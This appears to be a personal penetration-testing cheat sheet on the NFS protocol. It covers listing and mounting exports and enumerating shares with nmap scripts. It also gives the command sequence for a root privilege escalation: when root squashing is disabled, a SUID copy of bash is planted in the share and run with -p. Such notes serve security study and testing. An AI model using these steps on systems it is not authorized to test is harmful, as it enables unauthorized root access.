Network File System (NFS)
Network File System (NFS) is a protocol allowing a computer to mount a remote folder on its local file system.
ποΈ Port: 2049 (TCP)
NFS is based and utilises RPC for exchanges. It uses External Data Representation (XDR) for data serialization.
List mounts πΊοΈ
$ showmount -e IP
# see NFS exports
$ cat /etc/exports
Mount/Unmount π€
The command below will mount the remote folder /share
inside /tmp/share
on our machine. It means that when we browse /tmp/share
, we will see the files inside /share
on the remote host.
# sudo apt install nfs-common
$ mkdir /tmp/share
$ sudo mount -t nfs IP:/share /tmp/share/ # [-nolock]
# there is also variants (with/without vers=2):
# sudo mount -o rw,vers=2 IP:/share /tmp/share/
# unmount
$ sudo umount /tmp/share
NFS vulnerabilities β οΈ
- It's possible to use
nmap
to get information about NFS shares:
$ nmap IP -p 2049 --script=nfs-ls,nfs-statfs,nfs-showmount
$ sudo nmap IP -p111,2049 -sV --script nfs*
$ sudo nmap IP -p111,2049 -sV -sC
- When root_squashing is disabled, a local root user is mapped to the remote root user, allowing them to create SUID files.
# on the remote host, we create a bash inside the share
$ cp /bin/bash /share/sbash
# on the local host
# we give the file root privileges
$ sudo chown root /tmp/share/sbash
$ sudo chmod +s /tmp/share/sbash
# Then on the host, running the SUID file
# will run it as root
$ /share/sbash -p
π» To-do π»
Stuff that I found, but never read/used yet.
NFS
- nfs-utils (ubuntu), nfs-ganesha (solaris), openNFS (RedHat)
- nfsstat
- nfswatch
- DoS
-
systemctl restart nfs-kernel-server ; exportfs
Add an export
-
echo '/tmp/share CIDR(sync,no_subtree_check)' >> /etc/exports